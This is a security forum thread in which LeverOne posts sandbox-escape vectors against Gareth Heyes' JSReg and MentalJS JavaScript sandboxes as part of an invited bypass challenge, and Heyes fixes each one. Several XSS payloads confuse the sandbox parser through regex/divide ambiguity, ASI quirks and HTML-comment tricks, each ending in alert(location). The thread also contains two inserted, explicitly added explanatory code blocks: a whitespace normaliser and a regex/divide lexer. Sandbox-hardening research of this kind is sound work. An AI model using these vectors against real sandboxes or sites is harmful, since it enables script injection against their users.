Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away.
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 21, 2011 07:29PM

So I thought about supporting line/para etc. and rewriting all my \s, but then I decided to cut corners and normalize all spaces and new lines. Literal characters will be replaced, but escaped ones should be allowed. Thanks again!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 21, 2011 10:48PM

I suggest adding these non-FF spaces \u202f and \u205f to the spaceChars regex,
and doing something with the literal characters \u1680, \u180e, \u0085 (spaces in IE6-8) and \u0000, \ufffe, \ufeff during normalization.

bugs:

1. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#196

2. variable regex has an invalid structure: /(?:[^\x00-\x7f[ \f\n\r\u000b\u2028\u2029]+...

3. this['f$oo']=1;'$f'+'oo' in this; // operator precedence must be taken into account here

----------------------
~Veritas~



Edited 7 time(s). Last edit at 09/25/2011 07:52PM by LeverOne.
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 26, 2011 06:25AM

Thanks!

I've normalized those spaces and fixed the variable regex. The first bug is fixed, but now toString/valueOf etc. appear in the for loop, so you have to use hasOwnProperty if you want to remove them from your code. To fix this I'll probably have to get the object the for loop is on and pass it to the function. The same goes for the 3rd bug: I need to know the intended object of "in" or somehow rewrite prop checks with $ automatically.

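
A normaliser in the spirit of what the two posts above describe, added here as an example and not taken from JSReg: it maps every literal space-like character, including the ones LeverOne lists, to U+0020 and every line terminator to a single newline, and it leaves escaped forms alone because an escape such as `\u202f` in a string literal is six ASCII characters by the time the regex runs. `SAMPLE` is constructed for this page. `engineTreatsAsSpace` is there to show why a sandbox cannot simply lean on `\s`: which of these characters `\s` matches depends on the engine and its Unicode version.

```javascript
"use strict";
// Added example, not JSReg code. Rewrites the literal whitespace characters
// discussed in the posts above to a plain space before source reaches a parser,
// while leaving escape sequences such as "\u202f" inside string literals
// untouched (they are ASCII, so the regex never sees the real code point).

// ECMAScript WhiteSpace (every \s except line terminators) plus the characters
// that only some engines or old IE treated as space, or that are unprintable.
const SPACE_LIKE =
  /[\t\v\f \u00a0\u1680\u180e\u2000-\u200a\u202f\u205f\u3000\ufeff\u0085\u0000\ufffe]/g;
// Line terminators are kept, as a single "\n", because ASI depends on them.
const LINE_TERMINATORS = /\r\n|[\r\u2028\u2029]/g;

function normalizeWhitespace(src) {
  return src.replace(LINE_TERMINATORS, "\n").replace(SPACE_LIKE, " ");
}

// Does *this* engine's \s match the character? U+202F/U+205F/U+1680 are Zs and
// match; U+0085 never matched; U+180E stopped matching when Unicode 6.3 moved it
// out of Zs. That variance is why the normaliser lists characters explicitly.
function engineTreatsAsSpace(ch) {
  return /\s/.test(ch);
}

// Constructed sample: a narrow no-break space and an Ogham space mark around
// the assignment, a CR LF line break, and an escaped \u202f that must survive.
const SAMPLE = "x\u202f=\u16801;\r\ns = '\\u202f';";
```

After normalisation `SAMPLE` reads `x = 1;` followed by `s = '\u202f';` on the next line, with the escape sequence intact.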
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 27, 2011 04:04PM

1?{}:/='lo/,alert(parent.location)//'
~{x:/='/,lo:alert(parent.location)}//'

Edited 2 time(s). Last edit at 09/27/2011 04:12PM by LeverOne.
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 28, 2011 07:10AM

I'm quite embarrassed by this one :O, I knew when I modified the code to combine it with operators I'd forget something. The regex didn't check for a colon and the operators didn't check if there was something left. So now I've added the colon to the regex check and updated the operators check. Amazing skill with the exploit though, since you realized all of the above :)

Update....
I've updated the operators completely and now done some detection for ++ and --. Hopefully there won't be any new bugs, but you never know, I might have missed the obvious because of the new code.

Edited 1 time(s). Last edit at 09/29/2011 11:43AM by Gareth Heyes.
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 30, 2011 09:12AM

0?/='lo/i:alert(parent.location)//'

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: September 30, 2011 01:32PM

Thanks again, clever! I've fixed it. I forgot about ternary for some reason; I don't remember removing it from regexes, but there you go.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: October 03, 2011 03:41PM

0?lo:/='/,alert(parent.location)//'

switch(1){case 1:{}/'lo/,alert(parent.location)}//'}  // default:{} <-- the same

bugs:

1.
i=1;i++
{}

2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612

3. ~{}

----
// I stopped thinking about it, but the ideas still come to me.

Preventing future bypasses via unsupported statements.

When browsers implement ES6 features, it will open some holes in JSReg's parser. To fix this it's necessary, for example, to keep the protection ('$') in names for 'correctedOutput'.

To test this right now on FF (2+) I changed one line of JSReg.

iframe.contentWindow.document.write('<script type="text/javascript">' + code + '<\/script>');

// to

iframe.contentWindow.document.write('<script type="application/javascript;version=1.7">' + code + '<\/script>');

Obviously, these features will become available for the "text/javascript" type with time.

// FF
with({'let':function(){}})let(i=1)/'/;/*';alert(window[1<!--i),('location'
]);/lo*/

!function(){with({'yield':1})yield/'/;/*';alert(window[1<!--0[0]),('location'
]);/lo*/}()

Test: [olo-olo-lo.narod.ru]

----

Quote

can you explain why this is a bug?

parseTree.push("RegExps(" + output + ")"); // <-- 'output' instead of 'regexOutput'. You've already corrected it.


----

Until the spring.

Edited 5 time(s). Last edit at 10/14/2011 06:31AM by LeverOne.
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 13, 2011 09:31AM

Damn thanks!

I think I'd better modify the states used to a whitelist approach for regex and divide.

Update...
Ugh, yeah, all these new features are hard to tame. I wish you could downversion them too, disable E4X etc. I'll think about this. I'm working on the changes now.

Update++
OK, fixed those. I now force object literals when JSReg detects them, so x={} will become x=({}). I've added the version number for the script tag and now the corrected output has rewritten objects. Fixed those syntax bugs too.

Quote

2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612

Please can you explain why this is a bug? I looked but I didn't understand your point, since the regex parser checks for the ending "/" and then looks for either i, m or g; if neither character exists then it ends the regex parsing.

Quote

parseTree.push("RegExps(" + output + ")"); // <-- 'output' instead of 'regexOutput'. You've already corrected it.

LOL. Well, I corrected it, unrelated to your post, after noticing the output was wrong, then checked it afterwards and thought it was to do with the bit above that, doh. It was 2am so I guess I confused myself and fixed it subconsciously.

Edited 3 time(s). Last edit at 10/15/2011 04:54PM by Gareth Heyes.
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 10, 2011 11:28AM

Has it finally beat master lever one? Or are your excellent javascript martial art skills being fine tuned elsewhere?

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: November 11, 2011 07:26AM

As I said above, I'll return to JSReg in March or April of 2012, I want to finish my look too, but I'm busy.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 11, 2011 09:47AM

Ah, sorry, I missed that. Thanks for your hard work! I really appreciate it.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: February 25, 2012 04:29PM

if(1)/**/{}/'//*'+function{1:lo}/'/,alert(parent.location))//*/-/'/
lo='@mozilla.org/js/function'; 
1<!--0[0];alert(lo: :['location']);

`if(1)/**/` and `<!--` are just some of the options for hiding the wrong code at the stage of initial syntax checking. Most of the violations listed in the next post can be used for this purpose.

Edited 1 time(s). Last edit at 02/25/2012 07:45PM by LeverOne.
Current syntactic violations in JSReg
Posted by: LeverOne
Date: February 25, 2012 06:40PM

In this post I will list all incorrect changes to the original code (syntactic violations) which exist in the current version of JSReg.

You can edit this post.

1)

this['f$oo']=1;'$f'+'oo' in this; // operator precedence must be taken into account here

2)

switch(1){case 1:{} // <-- should be parsed as a block.
}

3)

switch(1){default:{} // <-- should be parsed as a block.
}

4)

if(0)/**/{} // <-- should be parsed as a block or f/statement (if it's a function)
else/**/{}
switch(0)/**/{default:0}
while(0)/**/{}
do{}while(0)/**/{}
for(;0;)/**/{}
with(0)/**/{}

5)

for(a in [])/**/{} should be equivalent to for(a in []){}

6)

return
{} // should be parsed as a block.

return /i/
{}

return /i/
a=1


for(;0;)continue
{}

for(;0;)break
{}


for(;0;)continue
a=1

for(;0;)break
a=1

x:for(;0;)continue x
/i/i // <-- reg.exp.

x:for(;0;)break x
/i/i


7)

i=1;
i+++i

i=1;
i++ +i

i=1;
i
+++i

8)

1.instanceof Number

1.E10

1 . E10
1 .E10
1. E10

1.[0]

1..x

9)

0[0]-->1

10)

for(;{}*0;)0
for(;function(){}*0;)0

for(;0;{})0

11) This problem can be fixed in the least, otherwise there may be breaks.

x:{} // well known but incorrect

if(0)function x(){} // etc

12)

var x=function(){'blalba'},z
(y)=1

13)

x=eval(1)
+1

14) `?:` takes special attention

0?{}/i:0 // look at parse tree



to be continued...




Edited 10 time(s). Last edit at 03/03/2012 02:51PM by LeverOne.
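
The bypasses in this thread (`0?/='lo/i:...`, `case 1:{}/'lo/...`, `1?{}:/='lo/...`, `typeof/lo;...`, `1<!--0[0]...`) and most of the violations list above turn on one question: after a given token, does a `/` begin a regular expression or divide? The lexer below is an added example written for this page, not JSReg or MentalJS code. It answers that question by tracking what the preceding token ended: whether a `}` closed a block, an object literal or a function expression, whether a `)` closed an `if`/`while`/`for`/`with`/`switch`/`catch` head or a function head, and whether a `:` belongs to `?:` or to `case`/label. It also treats `<!--` and a line-initial `-->` as comments, as Annex B scripts do. It covers ES5 syntax only: no ASI, no arrow functions, and `?` nesting is counted globally rather than per scope, which is exactly the territory LeverOne's later vectors work in. All inputs in the test are constructed from the thread's vectors.

```javascript
"use strict";
// Added example, not JSReg/MentalJS code: decide for each "/" outside strings
// and comments whether it starts a RegExp literal or is a division operator.
// ES5 syntax only (no ASI, no arrow functions), plus Annex B HTML-like comments.

// After these words a "/" starts a RegExp: the word does not end a value.
const NON_VALUE_WORDS = new Set(["return", "typeof", "instanceof", "in", "of",
  "new", "delete", "void", "throw", "case", "do", "else", "yield", "break",
  "continue", "if", "while", "for", "with", "switch", "catch", "function",
  "var", "let", "const", "try", "finally"]);
// "(" after these words opens a head whose ")" is followed by a statement.
const HEAD_WORDS = new Set(["if", "while", "for", "with", "switch", "catch", "function"]);
// "{" after these words is a block, never an object literal.
const BLOCK_WORDS = new Set(["do", "else", "try", "finally"]);
const ID = /[A-Za-z_$][A-Za-z0-9_$]*/y;
const NUM = /0[xX][0-9a-fA-F]+|\d+\.?\d*(?:[eE][+-]?\d+)?|\.\d+(?:[eE][+-]?\d+)?/y;
const NL = /[\n\r\u2028\u2029]/;

function skipQuoted(src, i, q) {            // i at the opening quote
  for (let j = i + 1; j < src.length; j++) {
    if (src[j] === "\\") j++;
    else if (src[j] === q) return j + 1;
  }
  return src.length;                          // unterminated: swallow the rest
}

function skipRegex(src, i) {                // i at the opening "/"
  let inClass = false, j = i + 1;
  for (; j < src.length; j++) {
    const ch = src[j];
    if (ch === "\\") j++;
    else if (ch === "[") inClass = true;
    else if (ch === "]") inClass = false;
    else if (ch === "/" && !inClass) { j++; break; }
    else if (NL.test(ch)) break;              // unterminated literal
  }
  while (j < src.length && /[A-Za-z]/.test(src[j])) j++;   // flags
  return j;
}

function classifySlashes(src) {
  const out = [];            // { at, kind: "regex" | "div" }
  const braces = [];         // "block" | "object" | "fnexpr" per open "{"
  const parens = [];         // "head" | "fnhead" | "normal" per open "("
  let ternaries = 0;         // open "?", so ?: colons are told from case/label colons
  let prev = { type: "start" };   // start | stmt | value | op | word | fnhead
  let lineStart = true, headPending = false, fnExpr = false, i = 0;
  const isValue = () => prev.type === "value" ||
    (prev.type === "word" && !NON_VALUE_WORDS.has(prev.value));

  while (i < src.length) {
    const c = src[i];
    if (NL.test(c)) { lineStart = true; i++; continue; }
    if (/\s/.test(c)) { i++; continue; }
    if (src.startsWith("//", i) || src.startsWith("<!--", i) ||
        (lineStart && src.startsWith("-->", i))) {        // single-line comments
      while (i < src.length && !NL.test(src[i])) i++;
      continue;
    }
    if (src.startsWith("/*", i)) {
      const e = src.indexOf("*/", i + 2); i = e < 0 ? src.length : e + 2; continue;
    }
    lineStart = false;
    const pending = headPending; headPending = false;
    if (c === "'" || c === '"') { i = skipQuoted(src, i, c); prev = { type: "value" }; continue; }
    if (c === "/") {
      if (isValue()) { out.push({ at: i, kind: "div" }); i++; prev = { type: "op" }; }
      else { out.push({ at: i, kind: "regex" }); i = skipRegex(src, i); prev = { type: "value" }; }
      continue;
    }
    ID.lastIndex = i; let m = ID.exec(src);
    if (m) {
      const w = m[0];
      if (w === "function") {      // an expression unless in statement position
        fnExpr = !(prev.type === "start" || prev.type === "stmt" ||
                   (prev.type === "word" && BLOCK_WORDS.has(prev.value)));
      }
      // "function name(" keeps the head pending across the name
      headPending = HEAD_WORDS.has(w) || (pending && prev.value === "function");
      prev = { type: "word", value: w }; i += w.length; continue;
    }
    NUM.lastIndex = i; m = NUM.exec(src);
    if (m) { prev = { type: "value" }; i += m[0].length; continue; }
    i++;
    switch (c) {
      case "{":
        braces.push(prev.type === "fnhead" ? "fnexpr" :
          (prev.type === "start" || prev.type === "stmt" ||
           (prev.type === "word" && BLOCK_WORDS.has(prev.value))) ? "block" : "object");
        prev = { type: "stmt" }; break;
      case "}": prev = { type: braces.pop() === "block" ? "stmt" : "value" }; break;
      case "(":
        parens.push(!pending ? "normal" : fnExpr ? "fnhead" : "head");
        fnExpr = false; prev = { type: "op" }; break;
      case ")": {
        const k = parens.pop();
        prev = { type: k === "head" ? "stmt" : k === "fnhead" ? "fnhead" : "value" }; break;
      }
      case "]": prev = { type: "value" }; break;
      case ";": prev = { type: "stmt" }; break;
      case "?": ternaries++; prev = { type: "op" }; break;
      case ":":
        if (ternaries > 0) { ternaries--; prev = { type: "op" }; }
        else prev = { type: braces[braces.length - 1] === "object" ? "op" : "stmt" };
        break;
      case "+": case "-":                      // postfix ++/-- keeps the value context
        if (src[i] === c) { i++; if (!isValue()) prev = { type: "op" }; }
        else prev = { type: "op" };
        break;
      default: prev = { type: "op" };          // "[", ",", "=", "<", ">", "!", etc.
    }
  }
  return out;
}

const slashKinds = (src) => classifySlashes(src).map((t) => t.kind);
```

Running `slashKinds` over `switch(1){case 1:{}/'lo/,alert(parent.location)}//'` reports the `/` after `{}` as a RegExp start, which is what the browser does, because the `{` after `case 1:` was recorded as a block. A validator that treats every `}` as the end of a value reads `'lo/,alert(parent.location)}//'` as a string literal instead, and that disagreement is the bypass. Swap the `case` block for `y=function(){}` and the same `/` becomes division, because the `}` now closes a function expression.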

Re: Current syntactic violations in JSReg
Posted by: Gareth Heyes
Date: February 27, 2012 08:27AM

Wow :D

I really thought it would be hard for you to find a new bypass, this is sooooo cool. I'll rewrite JSReg to take into account these syntax mistakes and make the code better. Thanks!!

Re: Current syntactic violations in JSReg
Date: February 28, 2012 02:46PM

I'll add one that I found a while ago but did not yet have time to explore:

/./iiin({}) // Chrome only

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: Current syntactic violations in JSReg
Posted by: Gareth Heyes
Date: April 02, 2012 03:22AM

Working on a complete rewrite, thanks for the great vectors! This convinced me that I need to have my own error checking and redo how I handle parentheses etc. I dunno how long it will be since I have other work to do :( but it should result in better code.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 18, 2012 07:30AM

I wrote a new parser

[www.thespanner.co.uk]

I've checked it against previous attacks and the syntax problems list from LeverOne. I should be in a better position to fix issues now since I can match paren expressions and object literals etc. more easily.

Edited 2 time(s). Last edit at 10/18/2012 07:30AM by Gareth Heyes.
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: October 18, 2012 10:05PM

Thank you! Soon I will look in detail at the new sandbox. At the moment I have three suggestions:
1. Run hack test on Opera or GC.
2. Do something with "<!--" and "-->".
3. Upload MentalJS on googlecode.

Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: October 19, 2012 01:54AM

1. Doh. I've fixed the var statement stuff by adding it to current expression tracking.
2. Yeah ooops I need to sort that
3. Any reason you need it there? Easier for looking at code? I didn't get any code contributions from anyone last time so I didn't bother.

Update...
You might want to wait until I fix a lot of things :) need to restructure how function statements, function expressions and paren expressions work.

Edited 1 time(s). Last edit at 10/19/2012 10:50AM by Gareth Heyes.
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: October 22, 2012 06:38AM

// Any reason you need it there?

I often compare versions to understand exactly how the problem has been fixed. Sometimes I add my code to see how the input data is overwritten. Sometimes I leave my notes in the code to remember in the future.

// You might want to wait until I fix a lot of things

OK. I see the var statement fix was not complete. I'm following this thread.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 22, 2012 07:32AM

Fair enough I'll upload to google code, what license do you prefer? I consider you an owner of this project too since without you it would be nothing.

BTW your tests are amazing, have you considered releasing a js parser test suite? The edge cases are really really tricky to parse and a lot of other parsers have problems.

There is a new version uploaded now. I'll put it on google code when I get an answer about the license. Please add me on gtalk if you use it gazheyes [removemepleasethisis not needed at gmail dot com

Edited 1 time(s). Last edit at 10/22/2012 07:37AM by Gareth Heyes.
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: October 22, 2012 08:32AM

// I consider you an owner of this project

Thanks, but I can't agree, because I know I'll not be doing commits. Choose a license on your own, please.

// have you considered releasing a js parser test suite

:) In my opinion it's more fun, when "a lot of other parsers have problems".

// add me on gtalk

I don't use gtalk.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 22, 2012 08:42AM

Quote

:) In my opinion it's more fun, when "a lot of other parsers have problems".

XD

Edited 1 time(s). Last edit at 10/22/2012 08:42AM by Gareth Heyes.
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: October 23, 2012 02:59AM

function lo(){i//
in/1};alert(location)//1}      // !Opera

var y=function(){},lo          // !FF
/'/,alert(location)//'

this
function lo(){}/'/,alert(location)//'

var NaN
/'/,alert(location)//'      // !FF

Tests:
var i=i
/i/i,a

var x
(x)=123,x
/i/i

var i
{}

Edited 9 time(s). Last edit at 10/23/2012 05:26AM by LeverOne.
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: October 23, 2012 05:33AM

OK, arch nemesis, I now force divide and regex and =/.
Fixed those.

You have a new toy as well, dom api.
b=document.createElement('b');b.appendChild(document.createTextNode('hello world!'));document.querySelector('form').appendChild(b);

Update...
and jQuery :O

1. Hit load jQuery
2. Hit execute
3. $ now contains a reference to a sandboxed jQuery!!

Edited 1 time(s). Last edit at 10/23/2012 09:29AM by Gareth Heyes.
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: October 26, 2012 03:01AM

I'm currently rewriting again, but this time not relying on the browser to validate syntax. I'm going to write it all and enable us to define rules, and hopefully fix these syntax based attacks. Oh, and it should be even faster since I'm now using if statements and a very limited amount of functions.

Update...
New version is up:
[www.businessinfo.co.uk]

Google code page:
[code.google.com]

You will notice the parsing is much faster now because I compare the charcodes directly and do a different method of parsing. I haven't got jQuery to work yet and ASI is still incomplete and I'm sure some missing syntax but I have my own validator now.

Edited 2 time(s). Last edit at 11/06/2012 05:12PM by Gareth Heyes.
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 10, 2012 05:03PM

1<!--0[0];for(var lo
{}/alert(location,i=0)/i<!--lo;);

Edited 1 time(s). Last edit at 11/10/2012 06:48PM by LeverOne.
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 11, 2012 05:43AM

Niiiiice :) very cool exploit of my ASI. I now check the context and insert a for-semi instead of a semi if required, so the { becomes an object literal.

Edited 1 time(s). Last edit at 11/11/2012 02:00PM by Gareth Heyes.
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 11, 2012 11:37PM

for(;0;)break
typeof/lo;alert(location)/+0

also continue + new, throw, delete, typeof

Edited 2 time(s). Last edit at 11/11/2012 11:48PM by LeverOne.